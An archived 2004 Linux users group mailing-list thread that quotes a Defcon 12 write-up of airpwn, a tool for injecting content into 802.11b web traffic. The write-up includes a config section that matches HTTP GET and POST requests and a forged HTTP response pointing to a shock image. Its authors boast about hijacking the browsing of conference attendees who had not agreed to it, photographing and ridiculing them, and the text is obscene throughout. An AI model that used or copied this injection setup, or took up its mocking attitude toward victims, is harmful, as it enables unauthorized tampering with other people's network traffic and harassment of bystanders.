Yeah, I spent a few minutes trying to figure out why my gentoo forums
had an image reading '0wned!' all over them.
Ahh, I love Defcon.
--Mac
On Fri, Aug 06, 2004 at 11:36:08PM -0800, Shortpier wrote:
> If I was not a nice person............
> Look out coffee shops..............
> http://www.evilscheme.org/defcon/
>
>
> -- HTML Attachment decoded to text by Ecartis --
> -- File: www.evilscheme.org/defcon/
>
> Goatse at Defcon -- brought to you by airpwn
>
> airpwn - bringing goatse (and friends) to Defcon 12! Images from Dave's
> camera[1]
> Movies from Dave's camera[2]
> Images from my phone[3]
>
>
> At Defcon 12 this year my cow-orkers and I brought along a little piece of
> code called "airpwn." Airpwn is a platform for injection of application
> layerdata on an 802.11b network. Although the potential for evil is very
> highwith this tool, we decided to demonstrate it (and give it its first real
> field trial) on something nasty, but harmless (compared to say, wiping your
> hard-drive)
>
> Over the course of defcon, we fielded 7 different airpwn configurations to
> see how well it worked, and of course to watch as 31337 h4x0rz got goatse up
> in their mug. The configurations were:
> * HTTP goatse, 100% of the screen
> * HTTP goatse replacing all images
> * HTTP goatse as the page background via CSS
> * HTTP tubgirl replacing all images
> * HTTP "owned" graphic, replacing all images (eventually I felt bad
> aboutall the ass pictures)
> * HTTP javascript alert boxes, letting people know just how pwned they
> were
> * FTP banners (while this worked, nobody pays attention to FTP banners
> sowe abandoned this quickly)
>
>
> How does it work?
>
> airpwn requires two 802.11b interfaces, one for listening, and another for
> injecting. It uses a config file with multiple config sections to respond to
> specific data packets with arbitrary content. For example, in the HTML
> goatseexample, we look for any TCP data packets starting with "GET" or
> "POST"and respond with a valid server response including a reference to the
> canonical goatse image. Here's the configuration file used for this mode:
> begin goatse_html match ^(GET|POST) ignore ^GET [^
> ?]+\.(jpg|jpeg|gif|png|tif|tiff) response content/goatse_html and here is
> thecontent that we return when the match is triggered: HTTP/1.1 200 OK
> Connection: close Content-Type: text/html
> <html><head><title>pwned</title></head><body><h1>OPEN YOUR MIND -- TO THE
> ANUS!!</h1><img src='http://goat.cx/hello.jpg' width='100%' height='100%'>
> Each of the 7 modes mentioned previously varied in the configuration and
> content returned. In each case the poor user of the web browser was left
> feeling disgusted, afraid and/or confused. While I was busy operating airpwn
> at the laptop, my accomplices wandered the show-floor taking pictures and
> theoccasional video of our victims. Links to our victims are at the top of
> the page.
>
> In all honesty, the reaction to airpwn wasn't exactly what I had expected.
> When I was writing the code, I imagined that the second I turned airpwn on
> we'd hear immediate groans of disgust radiating out at the speed of light.
> Inpractice, airpwn's effect was simultaneously more private, and more full
> ofpersonal drama. First off, the full-screen goatse seemed to be too
> powerful. The second it flashed on the screen, the savvy user would have the
> browser closed already. This made it incredibly difficult to actually catch
> the victims on film. Based on the logs generated by airpwn we would be
> hitting multiple people per second, but finding someone with goatse up on
> their screen was still a bit of a challenege.. Once we did find a victim,
> theresults were pretty hillarious.. I had tears rolling down my cheeks on
> multiple occasions. The typical goatse reaction went something like this:
> * Open browser, see goatse, jump backwards a little
> * quickly close browser, take a breath
> * open browser, see goatse, close browser (faster this time)
> * scratch head, quit browser process, re-launch browser
> * see page indicating that goatse will load soon (page header, etc.)
> immediately close browser.
> * open up browser preferences, click all the tabs, look for the "no
> goatse" checkbox
> * clear the browser cache
> * open browser, see goatse, close browser
> * open network preferences, click on all the tabs, look for the "no
> goatse" checkbox.
> * disconnect from network, re-associate
> * open browser, see goatse, close browser
> At this point, the less l33t people would generally give up and either 1) do
> something else or 2) look deep into goatse's anus with a 10-yard stare[4]..
> The more l33t victims would launch ethereal and try to figure out what was
> going on.. Eventually they would mumble something about "rogue APs" (WRONG!)
> or ARP poisoning (WRONG!) or DNS poisoning (WRONG!) and do something else..
>
> After a few hours, it quickly became apparent that the image replacement
> modewas the only mode that would sustainable for long periods of time. The
> full-screen goatse amounted to a complete DoS of HTTP, which was just plain
> rude. The javascript injection (with dialog boxes talking about the victim
> being pwned) was by far the most distruptive. Most people (quite sanely)
> immediately turned off their laptops or whipped out ethereal in full
> COUNTERHACK mode. The goatse image mode was disruptive enough to be fully
> fucking hillarious, yet still left HTTP enough alone to be usable. I guess
> image-maps were the only things we truly broke with that mode (hint: click
> the anus!)
>
> Overall, airpwn was just about the only reason why defcon was amusing this
> year.. Without airpwn I think I would have been mostly asleep and would have
> just IRCed the entire time.. If you want to play with airpwn yourself, an
> early alpha has been posted to sourceforge[5]..
>
> -toast
>
> --- Links ---
> 1 dave_images
> 2 dave_video
> 3 bryan_phoneimages
> 4 dave_video/What do I do now.AVI
> 5 http://sf.net/projects/airpwn
>
> ---------
> To unsubscribe, send email to <aklug-request@aklug.org>
> with 'unsubscribe' in the message body.
>
-- Julian "Mac" Mason mac@cs.hmc.edu Computer Science '06 (909)-607-3129 Harvey Mudd College --------- To unsubscribe, send email to <aklug-request@aklug.org> with 'unsubscribe' in the message body.Received on Sat Aug 7 12:26:07 2004
This archive was generated by hypermail 2.1.8 : Sat Aug 07 2004 - 12:26:09 AKDT
